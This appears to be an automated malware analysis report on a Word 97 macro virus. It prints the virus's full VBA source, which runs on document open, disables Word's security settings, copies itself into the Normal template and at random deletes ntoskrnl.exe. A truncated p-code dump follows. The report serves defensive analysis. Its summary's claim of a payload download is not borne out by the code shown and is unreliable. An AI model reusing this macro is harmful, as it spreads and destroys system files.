Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5bd376495619a914…

MALICIOUS

Office (OLE)

49.5 KB Created: 2001-01-26 17:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 10d07942af5666c46399234184291fce SHA-1: 5a5ecc978a95398225fe9cb41026567ddf07eb30 SHA-256: 5bd376495619a9144314af5f3e0b15a6d91212c1a50627fb64f8440430410549
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. The script attempts to lower Word's security settings and injects code into the document's template, indicating an intent to download and execute a secondary payload. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Onex-3' further support its malicious nature.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5842 bytes
SHA-256: 2620b7f0717496563cf74f6c2bbdda77b55508aec31390e0d7674761a4103ea7
Detection
ClamAV: Doc.Trojan.Onex-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "homer"
Attribute VB_Base = "1Normal.homer"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
 On Error Resume Next
 Set Code = New DataObject
 Options.ConfirmConversions = 0
 Options.SaveNormalPrompt = 0
 Options.VirusProtection = 0
  If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
     CommandBars("Macro").Controls("Security...").Enabled = 0
     System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
  End If
 CommandBars("Tools").Controls("Macro").Enabled = 0
  If NormalTemplate.VBProject.VBComponents(1).Name = "homer" Then
    calla = True
   Else
    Set a = NormalTemplate.VBProject.VBComponents(1)
  End If
  If ActiveDocument.VBProject.VBComponents(1).Name = "homer" Then
    callb = True
   Else
    Set a = ActiveDocument.VBProject.VBComponents(1)
    saveit = True
  End If
  Set ab = a.CodeModule
   Code.SetText homer.VBProject.VBComponents(1).CodeModule.Lines(1, homer.VBProject.VBComponents(1).CodeModule.CountOfLines)
   ab.DeleteLines 1, ab.CountOfLines
   ab.InsertLines 1, Code.GetText
   a.Name = "homer"
   If calla = True And callb = True Then
    If Int(Rnd * 150) = 2 Then
      
    End If
   End If
  If saveit = True Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument

On Error Resume Next

DoEvents
Randomize
If Int(Rnd * 150) = 2 Then


If Dir("c:\winnt\system32\ntoskrnl.exe") <> "" Then Kill "c:\winnt\system32\ntoskrnl.exe"



End If

End Sub

'W97M.Homer.a

' Processing file: /opt/analyzer/scan_staging/52e1c30fb11b4fe0ba3c2b7931bd6096.bin
' ===============================================================================
' Module streams:
' Macros/VBA/homer - 3328 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	SetStmt 
' 	New <crash>
' 	Set Code 
' Line #3:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #4:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #6:
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #7:
' 	LitDI2 0x0000 
' 	LitStr 0x000B "Security..."
' 	LitStr 0x0005 "Macro"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #8:
' 	LitDI4 0x0001 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #9:
' 	EndIfBlock 
' Line #10:
' 	LitDI2 0x0000 
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #11:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0005 "homer"
' 	Eq 
' 	IfBlock 
' Line #12:
' 	LitVarSpecial (True)
' 	St calla 
' Line #13:
' 	ElseBlock 
' Line #14:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set a 
' Line #15:
' 	EndIfBlock 
' Line #16:
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0005 "homer"
' 	Eq 
' 	IfBlock 
' Line #17:
' 	LitVarSpecial (True)
' 	St callb 
' Line #18:
' 	ElseBlock 
' Line #19:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set a 
' Line #20:
' 	LitVarSpecial (True)
' 	St saveit 
' Line #21:
' 	EndIfBlock 
' Line #22:
' 	SetStmt 
' 	Ld a 
' 	MemLd CodeModule 
' 	Set ab 
' Line #23:
' 	LitDI2 0x0001 
' 	LitDI2 0x00
... (truncated)